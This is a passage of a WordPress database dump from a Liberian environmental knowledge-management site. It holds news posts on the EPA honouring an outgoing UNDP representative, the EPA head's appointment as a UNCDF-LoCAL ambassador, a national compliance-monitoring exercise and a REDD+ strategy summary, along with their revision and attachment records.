wp:paragraph -->\n<p>Flanked by some members of the senior management team, Prof. Tarpeh said Mr. Rodriques has transformed the relationship between UNDP, as an implementing entity and the EPA.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“We are here in a small but special way to say Stephen thank you. Thank you on behalf of the Board of the EPA, the management, and the staff of the EPA for the level of collaboration you were able to attain,” Tarpeh said.&nbsp;&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He disclosed that when the met Mr. Rodriques for the first time two years ago, he had thought that his twins’ brother had been resurrected because they share similarities.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He described Mr. Rodriques “as a friend, brother, and a trusted partner.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Prof. Tarpeh hopes UNDP continues its support and collaboration with the EPA without Mr. Rodriques.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In a statement, the outgoing UNDP Resident Representative disclosed that the relationship between UNDP and EPA has increased under the leadership of Prof. Tarpeh.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Speaking at the farewell dinner Representative Rodriques described Prof. Tarpeh as his ‘twins brother’ and said they have had a warm relationship since he arrived in Liberia.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“It has been easy to talk, we have the same minds,” the UNDP outgoing resident representative said pointing at Prof. Tarpeh wearing a smile.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mr. Rodriques continued, “It has been an absolute pleasure and blessing to work with you”.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“The partnership between EPA and UNDP has intensified under your leadership. It’s you and your team and my team. I want to recognize them. We have always had the intents of Liberia,” Mr. Rodriques emphasized.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He disclosed that he had always felt at home while serving in Liberia knowing that First Lady Clar Marie Weah is from Jamaica and that President Weah loves Jamaica, where he hails from.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mr. Rodriques arrived in Liberia during COVID 19 upsurge.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He narrated that while on his way from the airport, he saw many ‘brothers and sisters’ who look similar to people back home in Jamaica.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to him, the first people he met here were a Jamaican family who had migrated here.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He also recalled having cordial working relations with Mines and Energy Minister Gesler E. Murray who he called a fatherly figure.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The outgoing UNDP Resident Representative indicated that he was warmly embraced by Minister Murray, whom he had a discussion with about the Monrovia Metropolitan Climate Coastal Resilience Project (MMCCRP) and the Sinoe Coastal Defense Project.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He appreciated Assistant Mines and Energy Minister Johnson Willabo and said he’s a pillar of power and strength.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>&nbsp;Mr. Rodriques explained that the relationship has been incredible from the President to the Chief Justice and the National Elections Commission and Minister of Internal Affairs.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The outgoing UNDP Representative said he’s leaving with a heavy heart and disclosed that his biggest regret is the duration of his time in Liberia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“I was negotiating to stay until after the elections and I want to see the MMCRP break ground and the construction started, but I take comfort in the fact that the leadership of Prof. Tarpeh and Minister Murray and the strong team that I am leaving back will carry this forward and what was started will continue and it will benefit the people. May God bless Mama Liberia,” he concluded.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Also speaking, Minister Murray thanked Mr. Rodriques for his services which he described as exceptional.</p>\n<!-- /wp:paragraph -->','EPA Honors Outgoing UNDP Representative Gowned, Certificates Stephen Rodriques','','publish','open','closed','','epa-honors-outgoing-undp-representative-gowned-certificates-stephen-rodriques','','','2023-05-22 09:09:00','2023-05-22 09:09:00','',0,'https://ekmsliberia.info/?p=5353',74,'post','',0),(5354,42,'2023-05-22 09:08:09','2023-05-22 09:08:09','','epa-undp','','inherit','open','closed','','epa-undp-2','','','2023-05-22 09:08:09','2023-05-22 09:08:09','',5353,'https://ekmsliberia.info/wp-content/uploads/2023/05/epa-undp.jpg',0,'attachment','image/jpeg',0),(5355,42,'2023-05-22 09:08:58','2023-05-22 09:08:58','<!-- wp:paragraph -->\n<p><strong>Monrovia….</strong> Authorities of the Environmental Protection Agency (EPA) of Liberia over the weekend honored, certificated, and gowned United Nations Development Program (UNDP)’s outgoing Resident Representative Stephen Rodriques for his contributions to the environmental sector of Liberia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>EPA Executive Director and Chief Executive Officer (CEO), Prof. Wilson K. Tarpeh presented a certificate of appreciation to Mr. Rodriques on behalf of the Board of Directors, Management, and Staff of the Agency at a dinner held in his (Rodriques) honor at Cape Hotel in Monrovia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Flanked by some members of the senior management team, Prof. Tarpeh said Mr. Rodriques has transformed the relationship between UNDP, as an implementing entity and the EPA.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“We are here in a small but special way to say Stephen thank you. Thank you on behalf of the Board of the EPA, the management, and the staff of the EPA for the level of collaboration you were able to attain,” Tarpeh said.&nbsp;&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He disclosed that when the met Mr. Rodriques for the first time two years ago, he had thought that his twins’ brother had been resurrected because they share similarities.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He described Mr. Rodriques “as a friend, brother, and a trusted partner.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Prof. Tarpeh hopes UNDP continues its support and collaboration with the EPA without Mr. Rodriques.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In a statement, the outgoing UNDP Resident Representative disclosed that the relationship between UNDP and EPA has increased under the leadership of Prof. Tarpeh.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Speaking at the farewell dinner Representative Rodriques described Prof. Tarpeh as his ‘twins brother’ and said they have had a warm relationship since he arrived in Liberia.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“It has been easy to talk, we have the same minds,” the UNDP outgoing resident representative said pointing at Prof. Tarpeh wearing a smile.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mr. Rodriques continued, “It has been an absolute pleasure and blessing to work with you”.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“The partnership between EPA and UNDP has intensified under your leadership. It’s you and your team and my team. I want to recognize them. We have always had the intents of Liberia,” Mr. Rodriques emphasized.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He disclosed that he had always felt at home while serving in Liberia knowing that First Lady Clar Marie Weah is from Jamaica and that President Weah loves Jamaica, where he hails from.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mr. Rodriques arrived in Liberia during COVID 19 upsurge.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He narrated that while on his way from the airport, he saw many ‘brothers and sisters’ who look similar to people back home in Jamaica.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to him, the first people he met here were a Jamaican family who had migrated here.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He also recalled having cordial working relations with Mines and Energy Minister Gesler E. Murray who he called a fatherly figure.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The outgoing UNDP Resident Representative indicated that he was warmly embraced by Minister Murray, whom he had a discussion with about the Monrovia Metropolitan Climate Coastal Resilience Project (MMCCRP) and the Sinoe Coastal Defense Project.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He appreciated Assistant Mines and Energy Minister Johnson Willabo and said he’s a pillar of power and strength.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>&nbsp;Mr. Rodriques explained that the relationship has been incredible from the President to the Chief Justice and the National Elections Commission and Minister of Internal Affairs.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The outgoing UNDP Representative said he’s leaving with a heavy heart and disclosed that his biggest regret is the duration of his time in Liberia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“I was negotiating to stay until after the elections and I want to see the MMCRP break ground and the construction started, but I take comfort in the fact that the leadership of Prof. Tarpeh and Minister Murray and the strong team that I am leaving back will carry this forward and what was started will continue and it will benefit the people. May God bless Mama Liberia,” he concluded.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Also speaking, Minister Murray thanked Mr. Rodriques for his services which he described as exceptional.</p>\n<!-- /wp:paragraph -->','EPA Honors Outgoing UNDP Representative Gowned, Certificates Stephen Rodriques','','inherit','closed','closed','','5353-revision-v1','','','2023-05-22 09:08:58','2023-05-22 09:08:58','',5353,'https://ekmsliberia.info/?p=5355',0,'revision','',0),(5356,42,'2023-05-15 09:10:00','2023-05-15 09:10:00','<!-- wp:paragraph -->\n<p>The Board of Directors of the United Nations Capital Development Fund-Local Climate Adaptive Living Facility (UNCDF-LoCAL) has appointed Prof. Wilson K. Tarpeh, executive director of the Environmental Protection Agency (EPA) of Liberia as its ambassador.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He was appointed at the 10<sup>th</sup> annual Board Meeting of UNCDF-LoCAL on 12 May 2023 in Brussels, Belgium.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Prof. Tarpeh is now tasked with the responsibility to lobby and advocate for LoCAL as a means to channel climate finance to the local level in developing and least-developed countries.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He will as well encourage other countries to join and adopt the LoCAL&nbsp;mechanism.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The LoCAL mechanism is an opportunity to present vertical integration of adaptation at the local level.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>&nbsp;It offers an opportunity to implement systems for adaptation financing that ensure funds reach the people that need it the most– local communities.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“And this is in line with the vision of the Pro-Poor Agenda for Development and Prosperity under the leadership of President&nbsp;George&nbsp;M.&nbsp;Weah,” a release from the EPA said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In response, Prof. Tarpeh said, “This accomplishment is dedicated to the men and women of the EPA, upon whose commitment, dedication, and professional output over the years, have made this possible.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Secondly, we bestow this designation to the Board of Directors for its sterling and strategic guidance and oversight,” The EPA Boss added.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>&nbsp;Speaking further, Prof. Tarpeh said “Lastly, and most importantly, we dedicate this to the President of the Republic whose recognition and support of the EPA, has put Liberia on the top edge of the Global Climate Change&nbsp;Architecture.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Prof. Tarpeh’s appointment as ambassador speaks to the huge leap he has made at the EPA.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>It will bring enormous benefits to Liberia as LoCAL helps local government authorities in least-developed countries and other developing countries access the climate finance, capacity-building and technical support they need to respond and adapt to climate change.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>A standard, internationally recognized mechanism designed and hosted by the UN Capital Development Fund (UNCDF), LoCAL promotes climate-change-resilient communities and local economies.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>LoCAL is owned by participating countries, most of which are LDCs, with priorities defined at the annual LoCAL Board.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>At COP26, the LDC Group recognized LoCAL as a long-term initiative in support of LDCs\' climate action objectives.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>&nbsp;LoCAL supports LDCs&nbsp;in&nbsp;reviewing and implementing Nationally Determined Contributions and&nbsp;National Adaptation Plans&nbsp;as well as&nbsp;securing&nbsp;direct access&nbsp;to international finance from the Adaptation Fund and&nbsp;Green Climate Fund&nbsp;for further deployment of the mechanism.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The LoCAL guidelines were endorsed by the LDC Expert Group to the UNFCCC in 2019</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>LoCAL has engaged some 304 local governments, representing over 11.5 million people in 16 countries: Bangladesh, Benin, Bhutan, Burkina Faso, Cambodia, The Gambia, Ghana, Lao PDR, Lesotho, Malawi, Mali, Mozambique, Nepal, Niger, Tanzania, and Tuvalu. Another 13 countries have expressed interest in deploying LoCAL and design activities are underway, these include Côte d’Ivoire, Fiji, Guinea, Jamaica, Liberia, São Tomé and Príncipe, Senegal, Solomon Islands, Somalia, Sudan, Uganda, Vanuatu, and Zambia bringing the total number of LoCAL countries to 29, with the potential to reach some 600 million people.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>A key benefit of LoCAL is its versatility.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Though many LDCs have a shared and unenviable position on the climate change frontline, their countries are being challenged in very different ways – so Niger is battling drought and desertification while Bangladesh is holding back floods and rising sea levels.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“LoCAL is designed to be systemic yet flexible,” said Sophie De Coninck, LoCAL Facility Manager. “One of the reasons the mechanism is able to deliver results in countries that are facing very different climate challenges is that local governments and communities decide what adaptation actions the grants should finance and really take ownership of the whole process.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Local governments are supported to develop climate change adaptation plans that meet their community’s needs. Actions are financed through special grants, known as performance-based climate resilience grants (PBCRGs), and include technical support and capacity-building measures.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>LoCAL, originally designed by the UN Capital Development Fund, is strongly supported with funding from the European Union and Member States, in particular Sweden. Over US $125&nbsp;million of funds, including domestic resources, have already been mobilised. Actions are as varied as the needs of the countries and vulnerable groups that participate in LoCAL.</p>\n<!-- /wp:paragraph -->','Liberia: EPA Boss Named UN Envoy for Local Climate Adaptive Living Facility','','publish','open','closed','','liberia-epa-boss-named-un-envoy-for-local-climate-adaptive-living-facility','','','2023-05-22 11:06:19','2023-05-22 11:06:19','',0,'https://ekmsliberia.info/?p=5356',73,'post','',0),(5357,42,'2023-05-22 09:14:12','2023-05-22 09:14:12','','prof','','inherit','open','closed','','prof','','','2023-05-22 09:14:12','2023-05-22 09:14:12','',5356,'https://ekmsliberia.info/wp-content/uploads/2023/05/prof.jpg',0,'attachment','image/jpeg',0),(5358,42,'2023-05-22 11:06:15','2023-05-22 11:06:15','<!-- wp:paragraph -->\n<p>The Board of Directors of the United Nations Capital Development Fund-Local Climate Adaptive Living Facility (UNCDF-LoCAL) has appointed Prof. Wilson K. Tarpeh, executive director of the Environmental Protection Agency (EPA) of Liberia as its ambassador.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He was appointed at the 10<sup>th</sup> annual Board Meeting of UNCDF-LoCAL on 12 May 2023 in Brussels, Belgium.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Prof. Tarpeh is now tasked with the responsibility to lobby and advocate for LoCAL as a means to channel climate finance to the local level in developing and least-developed countries.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He will as well encourage other countries to join and adopt the LoCAL&nbsp;mechanism.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The LoCAL mechanism is an opportunity to present vertical integration of adaptation at the local level.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>&nbsp;It offers an opportunity to implement systems for adaptation financing that ensure funds reach the people that need it the most– local communities.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“And this is in line with the vision of the Pro-Poor Agenda for Development and Prosperity under the leadership of President&nbsp;George&nbsp;M.&nbsp;Weah,” a release from the EPA said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In response, Prof. Tarpeh said, “This accomplishment is dedicated to the men and women of the EPA, upon whose commitment, dedication, and professional output over the years, have made this possible.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Secondly, we bestow this designation to the Board of Directors for its sterling and strategic guidance and oversight,” The EPA Boss added.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>&nbsp;Speaking further, Prof. Tarpeh said “Lastly, and most importantly, we dedicate this to the President of the Republic whose recognition and support of the EPA, has put Liberia on the top edge of the Global Climate Change&nbsp;Architecture.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Prof. Tarpeh’s appointment as ambassador speaks to the huge leap he has made at the EPA.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>It will bring enormous benefits to Liberia as LoCAL helps local government authorities in least-developed countries and other developing countries access the climate finance, capacity-building and technical support they need to respond and adapt to climate change.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>A standard, internationally recognized mechanism designed and hosted by the UN Capital Development Fund (UNCDF), LoCAL promotes climate-change-resilient communities and local economies.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>LoCAL is owned by participating countries, most of which are LDCs, with priorities defined at the annual LoCAL Board.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>At COP26, the LDC Group recognized LoCAL as a long-term initiative in support of LDCs\' climate action objectives.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>&nbsp;LoCAL supports LDCs&nbsp;in&nbsp;reviewing and implementing Nationally Determined Contributions and&nbsp;National Adaptation Plans&nbsp;as well as&nbsp;securing&nbsp;direct access&nbsp;to international finance from the Adaptation Fund and&nbsp;Green Climate Fund&nbsp;for further deployment of the mechanism.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The LoCAL guidelines were endorsed by the LDC Expert Group to the UNFCCC in 2019</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>LoCAL has engaged some 304 local governments, representing over 11.5 million people in 16 countries: Bangladesh, Benin, Bhutan, Burkina Faso, Cambodia, The Gambia, Ghana, Lao PDR, Lesotho, Malawi, Mali, Mozambique, Nepal, Niger, Tanzania, and Tuvalu. Another 13 countries have expressed interest in deploying LoCAL and design activities are underway, these include Côte d’Ivoire, Fiji, Guinea, Jamaica, Liberia, São Tomé and Príncipe, Senegal, Solomon Islands, Somalia, Sudan, Uganda, Vanuatu, and Zambia bringing the total number of LoCAL countries to 29, with the potential to reach some 600 million people.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>A key benefit of LoCAL is its versatility.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Though many LDCs have a shared and unenviable position on the climate change frontline, their countries are being challenged in very different ways – so Niger is battling drought and desertification while Bangladesh is holding back floods and rising sea levels.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“LoCAL is designed to be systemic yet flexible,” said Sophie De Coninck, LoCAL Facility Manager. “One of the reasons the mechanism is able to deliver results in countries that are facing very different climate challenges is that local governments and communities decide what adaptation actions the grants should finance and really take ownership of the whole process.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Local governments are supported to develop climate change adaptation plans that meet their community’s needs. Actions are financed through special grants, known as performance-based climate resilience grants (PBCRGs), and include technical support and capacity-building measures.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>LoCAL, originally designed by the UN Capital Development Fund, is strongly supported with funding from the European Union and Member States, in particular Sweden. Over US $125&nbsp;million of funds, including domestic resources, have already been mobilised. Actions are as varied as the needs of the countries and vulnerable groups that participate in LoCAL.</p>\n<!-- /wp:paragraph -->','Liberia: EPA Boss Named UN Envoy for Local Climate Adaptive Living Facility','','inherit','closed','closed','','5356-revision-v1','','','2023-05-22 11:06:15','2023-05-22 11:06:15','',5356,'https://ekmsliberia.info/?p=5358',0,'revision','',0),(5359,42,'2023-05-15 11:08:00','2023-05-15 11:08:00','<!-- wp:paragraph -->\n<p>The Environmental Protection Agency (EPA) of Liberia, in collaboration with the Liberia National Police (LNP) and the Ministry of Mines and Energy, will tomorrow, 16 May 2023 begin a three-week nationwide rigorous environmental compliance monitoring across the country.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The exercise will also include detailed environmental monitoring, chemical inventory, sampling, and analysis of environmental media (air, soil, and water quality) where feasible for informed decision-making in Liberia\'s sustainable management of natural resources.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>It is geared towards ensuring the sustainable operation of all ongoing and proposed projects in Liberia, in keeping with <strong>Part III, Section 6, and Annex I </strong>of the Environmental Protection and Management Law (EPML) of Liberia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“It is anticipated that this effort will help ensure the health and safety of the environment, including abating issues of environmental degradation and pollution,” Danise Love Dennis-Dodoo, Head of Media &amp; Corporate Communications at the EPA said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>She said that the intervention is in consonance with Article 6 of the Liberia Constitution, which guarantees \"every person in Liberia the right to life, and by extension, the right to a clean and healthy environment that supports that life\".</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Additionally, Mrs. Dodoo disclosed that the scope of the exercise is expected to cover both the counties and city limits, concessions, and forest landscape of the Republic of Liberia, where ongoing activities require the conduct of an environmental impact assessment and mitigation.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>She is calling on all concerned to grant the EPA monitoring team unhindered access to their facilities and provide all requested documents.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Meanwhile, the EPA welcomes full cooperation with all natural resource management institutions, the LNP, local municipal governments, and Township Commissioners.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Madam Dodoo disclosed that the monitoring team will arrive at each facility in an EPA-registered vehicle, along with their counterparts in their respective government-registered vehicles, and team members will display their working identification cards and conform to induction protocols as required by the facility’s health, safety, and environment team.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>She reassures the public of EPA’s commitment to maintaining a safe, clean, and healthy environment for this and succeeding generations.</p>\n<!-- /wp:paragraph -->','EPA Begins Nationwide Environmental Compliant Monitoring','','publish','open','open','','epa-begins-nationwide-environmental-compliant-monitoring','','','2023-05-22 11:29:17','2023-05-22 11:29:17','',0,'https://ekmsliberia.info/?p=5359',72,'post','',0),(5360,42,'2023-05-22 11:28:56','2023-05-22 11:28:56','','Tarpeh dee','','inherit','open','closed','','tarpeh-dee','','','2023-05-22 11:28:56','2023-05-22 11:28:56','',5359,'https://ekmsliberia.info/wp-content/uploads/2023/05/Tarpeh-dee.jpg',0,'attachment','image/jpeg',0),(5361,42,'2023-05-22 11:29:14','2023-05-22 11:29:14','<!-- wp:paragraph -->\n<p>The Environmental Protection Agency (EPA) of Liberia, in collaboration with the Liberia National Police (LNP) and the Ministry of Mines and Energy, will tomorrow, 16 May 2023 begin a three-week nationwide rigorous environmental compliance monitoring across the country.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The exercise will also include detailed environmental monitoring, chemical inventory, sampling, and analysis of environmental media (air, soil, and water quality) where feasible for informed decision-making in Liberia\'s sustainable management of natural resources.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>It is geared towards ensuring the sustainable operation of all ongoing and proposed projects in Liberia, in keeping with <strong>Part III, Section 6, and Annex I </strong>of the Environmental Protection and Management Law (EPML) of Liberia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“It is anticipated that this effort will help ensure the health and safety of the environment, including abating issues of environmental degradation and pollution,” Danise Love Dennis-Dodoo, Head of Media &amp; Corporate Communications at the EPA said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>She said that the intervention is in consonance with Article 6 of the Liberia Constitution, which guarantees \"every person in Liberia the right to life, and by extension, the right to a clean and healthy environment that supports that life\".</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Additionally, Mrs. Dodoo disclosed that the scope of the exercise is expected to cover both the counties and city limits, concessions, and forest landscape of the Republic of Liberia, where ongoing activities require the conduct of an environmental impact assessment and mitigation.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>She is calling on all concerned to grant the EPA monitoring team unhindered access to their facilities and provide all requested documents.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Meanwhile, the EPA welcomes full cooperation with all natural resource management institutions, the LNP, local municipal governments, and Township Commissioners.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Madam Dodoo disclosed that the monitoring team will arrive at each facility in an EPA-registered vehicle, along with their counterparts in their respective government-registered vehicles, and team members will display their working identification cards and conform to induction protocols as required by the facility’s health, safety, and environment team.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>She reassures the public of EPA’s commitment to maintaining a safe, clean, and healthy environment for this and succeeding generations.</p>\n<!-- /wp:paragraph -->','EPA Begins Nationwide Environmental Compliant Monitoring','','inherit','closed','closed','','5359-revision-v1','','','2023-05-22 11:29:14','2023-05-22 11:29:14','',5359,'https://ekmsliberia.info/?p=5361',0,'revision','',0),(5363,42,'2023-06-16 11:53:05','2023-06-16 11:53:05','Liberia is blessed with natural forests which sustain communities and contribute to the national economy. But the country faces a great challenge to lift incomes and create jobs for a rapidly growing population, whilst at the same conserving some of this forest for future generations. We know that we are losing our forest at an increasing rate. Those who depend most on the forest will suffer most from its loss.\r\nTo prevent the loss of our forest, the country has worked with national and international partners to reform the forestry sector so that it can deliver community, conservation and commercial benefits. Support for reform is coming increasingly from international agreements on climate change and voluntary partnership agreements that provide funds for reducing emissions from the loss of forests. Liberia is party to the United Nations Framework Convention on Climate Change and is committed to Reducing Emissions from Deforestation and Forest Degradation (REDD+). REDD+ aims to create a financial value for the carbon stored in forests, offering incentives for developing countries to reduce emissions from forested lands and invest in low-carbon paths to development.','NATIONAL STRATEGY FOR REDUCING EMISSIONS FROM DEFORESTATION AND FOREST DEGRADATION (REDD+) IN LIBERIA','','publish','closed','closed','','national-strategy-for-reducing-emissions-from-deforestation-and-forest-degradation-redd-in-liberia','','','2023-06-16 11:53:05','2023-06-16 11:53:05','',0,'https://ekmsliberia.info/?post_type=document&#038;p=5363',22,'document','',0),(5364,42,'2023-06-16 11:49:00','2023-06-16 11:49:00','','Screenshot 2023-06-16 at 11-47-55 liberia__s_-_national_redd__strategy_final.pdf','','inherit','open','closed','','screenshot-2023-06-16-at-11-47-55-liberia__s_-_national_redd__strategy_final-pdf','','','2023-06-16 11:49:00','2023-06-16 11:49:00','',5363,'https://ekmsliberia.info/wp-content/uploads/2023/06/Screenshot-2023-06-16-at-11-47-55-liberia__s_-_national_redd__strategy_final.pdf.png',0,'attachment','image/png',0),(5365,42,'2023-06-16 11:50:23','2023-06-16 11:50:23','','liberia__s_-_national_redd__strategy_final','','inherit','open','closed','','liberia__s_-_national_redd__strategy_final','','','2023-06-16 11:50:23','2023-06-16 11:50:23','',5363,'https://ekmsliberia.info/wp-content/uploads/2023/06/liberia__s_-_national_redd__strategy_final.pdf',0,'attachment','application/pdf',0),(5366,42,'2023-06-16 11:53:05','2023-06-16 11:53:05','Liberia is blessed with natural forests which sustain communities and contribute to the national economy. But the country faces a great challenge to lift incomes and create jobs for a rapidly growing population, whilst at the same conserving some of this forest for future generations. We know that we are losing our forest at an increasing rate. Those who depend most on the forest will suffer most from its loss.\r\nTo prevent the loss of our forest, the country has worked with national and international partners to reform the forestry sector so that it can deliver community, conservation and commercial benefits. Support for reform is coming increasingly from international agreements on climate change and voluntary partnership agreements that provide funds for reducing emissions from the loss of forests. Liberia is party to the United Nations Framework Convention on Climate Change and is committed to Reducing Emissions from Deforestation and Forest Degradation (REDD+). REDD+ aims to create a financial value for the carbon stored in forests, offering incentives for developing countries to reduce emissions from forested lands and invest in low-carbon paths to development.','NATIONAL STRATEGY FOR REDUCING EMISSIONS FROM DEFORESTATION AND FOREST DEGRADATION (REDD+) IN LIBERIA','','inherit','closed','closed','','5363-revision-v1','','','2023-06-16 11:53:05','2023-06-16 11:53:05','',5363,'https://ekmsliberia.info/?p=5366',0,'revision','',0),(5367,42,'2023-06-16 12:00:47','2023-06-16 12:00:47','Subscribe To Our Newsletter		\n			<a href=\"https://ekmsliberia.info/newsletter/\" role=\"button\">\n						Sign up now\n					</a>\n		Contribute to the EKMSAre you interested in contributing to the knowledge resources by submitting a blog, news, case study, report or a publication? <a style=\"color: #ffffff; text-decoration: underline;\" 